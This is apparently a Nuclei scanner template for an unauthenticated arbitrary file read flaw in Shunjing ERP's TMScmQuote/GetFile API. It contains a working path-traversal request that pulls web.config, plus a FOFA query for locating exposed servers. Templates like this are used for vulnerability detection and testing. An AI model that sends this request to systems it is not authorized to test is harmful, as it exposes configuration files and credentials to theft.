http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - <?xml version="1.0"
            - <configuration>
            - </configuration>
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /api/TMScmQuote/GetFile?FullGuidFileName=/../web.config&FileName= HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
id: shunjingERP-TMScmQuote_GetFile-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="顺景软件 WebAPI 服务端"
        顺景ERP TMScmQuote/GetFile 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: 顺景ERP TMScmQuote/GetFile 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s/bhfWDCDGNqPCwU_xhC-n1w?token=1543860814&lang=zh_CN
    severity: high
    tags:
        - File reading
